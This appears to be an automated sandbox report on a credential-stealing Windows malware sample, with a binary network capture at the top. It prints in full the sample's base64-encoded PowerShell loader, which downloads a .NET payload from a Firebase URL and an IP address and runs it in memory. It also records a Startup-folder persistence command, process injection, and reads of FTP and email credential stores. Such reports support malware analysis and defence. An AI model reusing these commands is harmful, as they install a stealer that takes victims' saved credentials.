7{ß)¹Æ|ªeÜǕzŽŸ× ê“qžžÚID=5« pgãF§S2 ãUOŸF½¶×R¹Ax€ŸˆôìT¤@l#ç•áHyvøâçR\ß“Èœðƒï¹ Ú£4ºÿéhà06ûîÞ7‚kó •d'9JАÀ˜¨»ŽüÓb—tfçIRìÉü»Z T0‡ªìûˆ \ã¡]àá'l¢€ŽZ¨¯I¹ã>6ðÙ HOo ë•I`5’Ä¡ØMÖðŒ"Ë<A¿sâë2B£k÷æå4øæ‹û©A w¹ª™²ãGûmÔØô^qYu…Û÷%‰¥ÃüT2–é$ɞUFÊÌ­ÅwtÚMŸG ¡ƒ<Åþ˜&=:ï™æâ!uÕAn D¼3E¹ªã¢Çd¼@ÂÒG QÒ5âN \oeãEÂu5!ÒA”~=,{NëU˜žË¼¤†Îø=± h‹ð„ª^”çõÑg%¥6㱿+dã2ÿCͯpV¾U)ïw±3…¹>s@=u߸ðÒÄ5u$Ã?÷%Ë%ß #¨MÀ; £(Ôi¨n,%£Œð ½1 ²‚Mgå¨(amƒXA‚Ö¶Òh#º5u8–ôXjÞȯûo™õµBçyë¾õ<Ø$ò„ ]2º¬2ìØ
Data received 0
Data received óµ{'›¥-'{̀};¯JÙ§<h&ÝH·«…¨KéEÚhWB¤Çxs;zÏPÕmè½¼w{clbp%\w¿ã13_ÂÜõíV 6›ñºý¾“©>p{°QÌ[:«Û'Š$…QÌÔæâÞó™5ì W>p4Ê(+k˜¹†_~XGöjG%B{,€Nr7,– ÖUN_xg—ÂU@QÅÁ:ýkŽ«”"Å!Ükà•Ýx ™jI·LD¿âHÿ'-o#¢à à3ÿg‰ ë2pMÍmµŠSóÀúRAƒe°ƒåØö¦È°¿¸çp]܈>v›"©*©!šxMDK7Š÷Âw Âîè{¨ðá²ÔžN‡2Âý‰ªÇ^Ž šSîÕ~Z-5ííÕµIëÙÐ÷ØÕóqõ6LF´ì8²«œuMUóBÆ ”TÁ‹//Í˜Í Û.ô€ËñÄܬ† RܱN•¦p—^àGà§0ؚ+5øœ(êéU|º–„0fžÇFô^y•ñÞ!º˜ÀiU5³fJ¹yŠf@S…æ‡aîó¼Ì³ÔM¢љSéI5€ŠK±¢˜Þ%fFÇяvǝ¬ êøÍöõ±¦™l†0`6–£?ÙÛ5ª7‘¤á”™×:EØaÅhðÁC°Ôùò1Níácd µÚµ/¹Dþs¶„öâmA>•ý„»?-t_Ô©¨©Gû9nh8Žk¼ñ±Á_Β€±ó(Î=!A†ýua:aò¬‰á—0­R©‘¿s>òLï<f6"'6Lï¤Ã±gÌXûöXµÌ·C$PÄ^‚4¾҅ÙV͆:‡MåȐ;…€ŽaìUpÛ½flTìÎþñR~—¼!ãÌk[x‘þXÚô€8ê¶Èk²–³“P²…Wcæ:^-°|£šÜ ÿu!¿ëC÷±Õý.L;hg.‚Sw¡ŽwA¡çOG·ïØ5Hز"¹<‡°åz¨£¹;¦Ü´þ*&J«Á
Data received Y`¶íºÄS¦åF})#Íl8Åö†7cø²Ó´pª Èâ*·œNSJ ²£ñxâý®ËÇ6‡‰LZœm0E\yMoP”ËnˆûA ’öÍÆ)ç‹#µTޅ¸Ý €²–-&Ö,“ð:#ØU~ûWü¡ ú¥é?–¿U+°Úë³ãF(íÕ81p…>9@¹î¾]ŸÔ–ð߄ÛÿuJL°(Ζ«|y‚>ëh §!»üEpýð+ßUa C˜i™³ËAp½p¹A=øÁ½V½M "Ë1EÝç6œÓ¢²%GÛx>\¥;àCÜþ¹>òéîë&BtXêô_Ùõ.lŶÏÁA_•/­!2°óyofŸöò®È¢/¶A’fQ)¾rÿ-íC§¡zãMé™G5ý·åÝ@« :Ìm‰|GóÔìeüÛPSºµqÿA}zTîdSä |Š–Ü{5ÑßjKm6CC«Ÿ¯ùH »¶9Ý@«Õãè·ÒªÎ;u%G~!<0"S'<ŒAO i•:䰚֮î÷;J¨'×-ŒàuQaíg>ÿñ,ì±Müƒ³¿ç€÷;ãçéön¸F #*v‘wgvx*Ú{¯n™ÄȌá†Íì¶SM äQ½n´¶ˆ™Bú¦šhꟚ~֙)H4‹$è`¾f¡«u÷‰óâƒe13ý?+(Òåˆ̂¹ÊÂȌ3úF„íh"
Data received 1‘æRQÃOwméžÜF“ mùüLÜX¯åÿ%?Y8Q< è´­hèù|(¼æ±ÖŽlƇR¸¢J-ï9pý¾á,eã>~òCXtÅ!›Vo´*1’Ïç<¯ß&jàk!Ît\„éé@mð•ì¤'8·+¦÷z#ðráPÚ;ʇɔß}#’Æ»" :ûÎ.dª÷¾ZŽž¯CÚBä!§=þxö5¶cEI!G†^v.—ŸÅ亶Tolóœéš\>•“kç¸÷£´áÁQp3B„ú½8M‹WUþù†Ãñrem!!h“_µ|Ñ€\恿Ï9Žõ1=b#¬ú­^dO°JÄÞÒn¸>Š†¦ÉÍÝAá}QÕ þ* ¬Uë©ÂÍÀŸõ­HT©d#rªúB4ý‡e-@%Í [#6™ÄqE¨tÿVàGk+m”]¿íý…úìu•ÅËöªê3 5É6SÐò8$”Ä¿Z ÚOF§ƒ?úݘŸù‘ˆ#—(åÎÝ‘Ê ^Y`֏Žeü:M îG±G/+¢Ë€#ßÑÌx×#zÅæ¡«sµugl¬«k¸¥ÊÔ~(õL<aijÖÀÙ3ÉÊѝB»¥§+¡H/´ýZµ³e hEƒR(ò3®cä|y­e’Îq\Hªž¹!›ñ¢àÎC§¿)ݤàgÜ+íµ30™ã:[ÿ­ë‹²Í%^~Û¢?ʮߧÝð…Çf@®õÚZ«•—ܴۍ‰Â.¶´žo+ï¤Ì•DYÑëæŠ ­ìÂݸ†<]éAbúėא~r7ùv7Á· >¬’ûkÓíõÃ7ï›;ãe{ÜS€0“½q¸èšÃ«÷憂·{G‰Sòæs(¾uJ9Øs¤˜ß¡Ã9$ªo¤‚N‰‹…ã2¢Ðæ­ÛИ4HŸ«‘É©&Ž]ل l«óà•0i”.·øù§_ÖÍ.âw±‡ˆØ}¶³Ì»ÎŒÃâ&6šÝº¿ÃÓ‰°ÏêÇúCÀ¦uÓ~Wá ¿^ :{Ì»­ÑÕN‰ÏÏUsö*XÌ°3G:¼^Òí#9ëÊÖc Ä[ç)!3nïãAX¡?ú³€²î6„ŸoõÅžþ üqܖÓGø®™×“]ðT`°QrZg‹¢Jå#Âñj°×iµùƒý}Þ!ú𠝀\9Ö Š(MùŽÅ⑉¡ßFÞsª²,¸°_<L<Çt»“]àG”žòźþïAv"¡\˜Htµ@ÀES©´õÍsQûuÃnC°þaº'E—Ǧ³ ¦u„É'ќK_úÒ}ǎ§RÀŽ©Ëš¨ÞNN̈ë¼^`hvÏ“.*îvј(ŽŒeíä~OÙ­<Þµ<È*µ®¾õwi¦W X~@T'Þz¼ ó6Ö¤4›²J«l€>œL˜ ¸Víû ïˆü3¤^©¢ãmËItØ}™ÝÖÍ<- 9QÊÓµ·ö£¶?²uÖ¸ >šªwQ‚¡Ø js[S ¢Dlø†1Ñù­n˜ž×Ù¬ë+&I2Þn~^}ô 8 ÆØTåÝXB£wzÇË\yX¤]¨ª +ì”Õ€Ž „aólð,¯(½ÎB¯ÖE(•š_…ÁÂÉ žšŠ°z•ÔÖM¶O6vtÍ&>NC-nØq¨\K±Þ3~ W=\ŸFŸõ ÆüÍ ½ÙÞJEz¥{ûæAÓÇ[BFÃüÍgÔ?¯!âvžk`Ø!xlÛY¨×a3~¾k+–ÕÀÏ÷õìJúî=9&ðãBóˆ­Í¥4~É›
Data received 3Óbø ›† ”Å)n6èrÐc»%ǕŽC0Æ27ckY#7Û«—!¥ÑþS–(m¦'Käsë²3tw ²ÒqBå›ç Ómt+彌<¶ ”uNRºPÀ?©çoϚ6“EÄÐøÑ[ÜÝTîc9Çdµ?‚ §Ì,A ŒwŠ³KÊ^u>MNPE¿—eÙÝl um³§mÉwfs.2B£eMµ(±†xcÌCŸOì¶-°ÊP„ÅwöŒ§#E(ç‹+Ä^3ªÈÍÛ#l‡ïU®]m¢¦ À†÷¦O‘<ç=w™:´š %l]Š¡›âº%ò~1‘šDö{;iµ§Öݚ*Îb3=¢Ød‰”)ï’øQ­ÁÒÅ ©œ)ðxºþ(yâ4+¡ç%õE¯}囑µ°u¯]˜»¶íÆƤ•ÛÛú ҍ}7ÿ2&ŠäGWK•o£5Ïeº=ä•Û,ö¡_~– ‰nÄ vó‰ô~|†¿'Ø ˆ˜j\aéò1 œÁQ+v;+HÃTM:SŒ”<bí†>tƒ¡?lŠÇêm;¸^`žêL…ÝzãNµØF øàME^AŽ‹`ö¶§«“‡ÂÐðF.+s®Q°þzÔklá—Ê'Òó§zò {k?×‚^nÒ¦Š=õ€N€ÿGa+ml<Íp!öða–œ ˆ”Š$œ Z!܃^Ný£lQf¶‰„B>¶0w¼HŠfcøs–TNîá Aùp¬>I{ó]·ºCtÛeæ¦91sT¬Z§‘»oz›ª¡›/K€z]*†6¾ÓbFV.—´lBÚê/ë.ßô,B@&€›ð =L[#òG8t£•swggaÑHà…=%hšAs¿"9 +_psH3ˆ?ó’yY˜¯m 7}mñäýKNSþؼ !QŸiã]쮤D"Íàî~È µyÔ¶0;ÈQð™xÃӋ$Û|´V4=W°D5灇–eNª¿¿óÑ{øa= ’.b° eÄ?wpM+7ºÆYŽ òÿ”å1|U>úh¼ƒ>š^ȀÍ.†áSwcÓ ÄfEŎE÷ô‰ñ½†û',Œ»9Äú*Øêî
Data received „DºµÐÅ÷¯Êr?é@B;ŽË¦ñ™Ì{7´òþpR7V~$6{5K[G<˜ž ø9.§ç–ëbµ[;zrôu¹ ç”JÏso^Â`üyF-rÛèì±n1š¦Œð³•Ð\ÿnéÊ]`0l]ÌìôÐöTŽ¾P»L€¨6݀µ9r¸Aƒknöë<ÃW6ý“zªDÓ¾Ó֙Oè֋ÂM¼ŽEžŽX©Ø‘YY ×ÁÑH>rµí Çÿä¯E’®°ÙY± zP¨2N:Ϩöö{·E÷®Ìâ Å3×ñ_ÈU|>®xÂï6Ž°`ù8"‡ÇڄkB¹l}B˜ÕuØäLhB„JŒ,Æþõ3]êYîå…j[ ì¨z I,j8 4UÐ!ð#_–,{ZÉøÃùtø,§r¬†Ü#îKûL½‹» ©L rºŒç\ž âI^+gfþ±Ñ$/‚ÏÇH›ËÌå$lPª 3êAY;´Í* yVþªbǪ›³(f÷WεøAíV•äÛs“¼Ñ­9à7ºX1|X¬2ˆeק§í%I1XõèÕ Ñ)ôëp`Wø¨QþŽtÝŠ£}U“˜ŒDåù#€<"<ÛÜIi{õç¥Ø` PM­6Š‹sõ¤Ú!
Data sent }e ¤JsÒ0“A«í2ÐÙ.ç•sS×Âö5ÇG÷í/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
Data sent FBAîÆÒ#]¡ö|ƒ¹è#Fsn-Ùg^=UÀ“‡3ã—!c|±ÙLŽTÒè¼ÕΠµ3²4‚/ºæ/ƒ¥t›Mþ0+f÷À·šˆL^_8NȺál2§Ëþ^RØ'·4d‹ýØ¥<%*Eª Øû Ÿdà
Data sent ÐéNrNÝ0Ï]. ˜æËãš22–Ÿx±ƒÙÒ)˄w-ñ¬óÖ­©.ՙ‡ùÑcÅà!³Õ!¤”K\«¨ÇåZ#ϊ”¯Õýˆõ"Þ éÛÙÃZ˜¿Ã‹ÜñÝõV’:GÞwÀ»Î¤±Yü‹U›U]<$Ã!0}O*÷Æx6:µŠì_ê0Ó=×̦ã™Ï>àúIœ%¢îÀ'ÂÖ pyÚõI&‚h›GäÑÏ\ÁÁR´ uvڛ÷Ñ ÉI7•ñ7HU“ô´¦€/îŸ
Data sent GET /88/Runtime.txt HTTP/1.1 Host: 198.46.178.152 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description PWS Memory rule Generic_PWS_Memory_Zero
description Communications smtp rule Network_SMTP_dotNet
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Run a KeyLogger rule KeyLogger
cmdline ping 127.0.0.1 -n 5
cmdline "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
cmdline cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
host 198.46.178.152
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 270336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000358
1 0 0
file C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect
file C:\Users\test22\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
registry HKEY_CURRENT_USER\SOFTWARE\FTPWare\COREFTP\Sites
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL­Feà 0®Í à@  @…ÈÌSàF  H.text$­ ® `.rsrcFà°@@.reloc ¶@B
base_address: 0x00400000
process_identifier: 2868
process_handle: 0x00000358
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€ à¼\ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalNamee5027e73-68a7-491a-b852-8635a83d4256.exe(LegalCopyright |)OriginalFilenamee5027e73-68a7-491a-b852-8635a83d4256.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0043e000
process_identifier: 2868
process_handle: 0x00000358
1 1 0

WriteProcessMemory

buffer: À =
base_address: 0x00440000
process_identifier: 2868
process_handle: 0x00000358
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2868
process_handle: 0x00000358
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL­Feà 0®Í à@  @…ÈÌSàF  H.text$­ ® `.rsrcFà°@@.reloc ¶@B
base_address: 0x00400000
process_identifier: 2868
process_handle: 0x00000358
1 1 0
file C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect
file C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry HKEY_CURRENT_USER\Software\RimArts\B2\Settings
registry HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

buffer: }e ¤JsÒ0“A«í2ÐÙ.ç•sS×Âö5ÇG÷í/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
socket: 1448
sent: 134
1 134 0

send

buffer: FBAîÆÒ#]¡ö|ƒ¹è#Fsn-Ùg^=UÀ“‡3ã—!c|±ÙLŽTÒè¼ÕΠµ3²4‚/ºæ/ƒ¥t›Mþ0+f÷À·šˆL^_8NȺál2§Ëþ^RØ'·4d‹ýØ¥<%*Eª Øû Ÿdà
socket: 1448
sent: 134
1 134 0

send

buffer: ÐéNrNÝ0Ï]. ˜æËãš22–Ÿx±ƒÙÒ)˄w-ñ¬óÖ­©.ՙ‡ùÑcÅà!³Õ!¤”K\«¨ÇåZ#ϊ”¯Õýˆõ"Þ éÛÙÃZ˜¿Ã‹ÜñÝõV’:GÞwÀ»Î¤±Yü‹U›U]<$Ã!0}O*÷Æx6:µŠì_ê0Ó=×̦ã™Ï>àúIœ%¢îÀ'ÂÖ pyÚõI&‚h›GäÑÏ\ÁÁR´ uvڛ÷Ñ ÉI7•ñ7HU“ô´¦€/îŸ
socket: 1448
sent: 213
1 213 0

send

buffer: GET /88/Runtime.txt HTTP/1.1 Host: 198.46.178.152 Connection: Keep-Alive
socket: 900
sent: 78
1 78 0
Process injection Process 2516 called NtSetContextThread to modify thread in remote process 2868
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4443422
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000039c
process_identifier: 2868
1 0 0
parent_process wscript.exe martian_process powershell -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
parent_process wscript.exe martian_process cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/88/251.871.64.891//:ptth'))"
parent_process powershell.exe martian_process C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Process injection Process 2516 resumed a thread in remote process 2868
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000039c
suspend_count: 1
process_identifier: 2868
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2076
thread_handle: 0x000002f8
process_identifier: 2072
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000300
1 1 0

CreateProcessInternalW

thread_identifier: 2428
thread_handle: 0x000002a4
process_identifier: 2424
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000300
1 1 0

CreateProcessInternalW

thread_identifier: 2136
thread_handle: 0x00000084
process_identifier: 2132
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 127.0.0.1 -n 5
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

thread_identifier: 2252
thread_handle: 0x00000088
process_identifier: 2248
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2132
1 0 0

CreateProcessInternalW

thread_identifier: 2304
thread_handle: 0x00000084
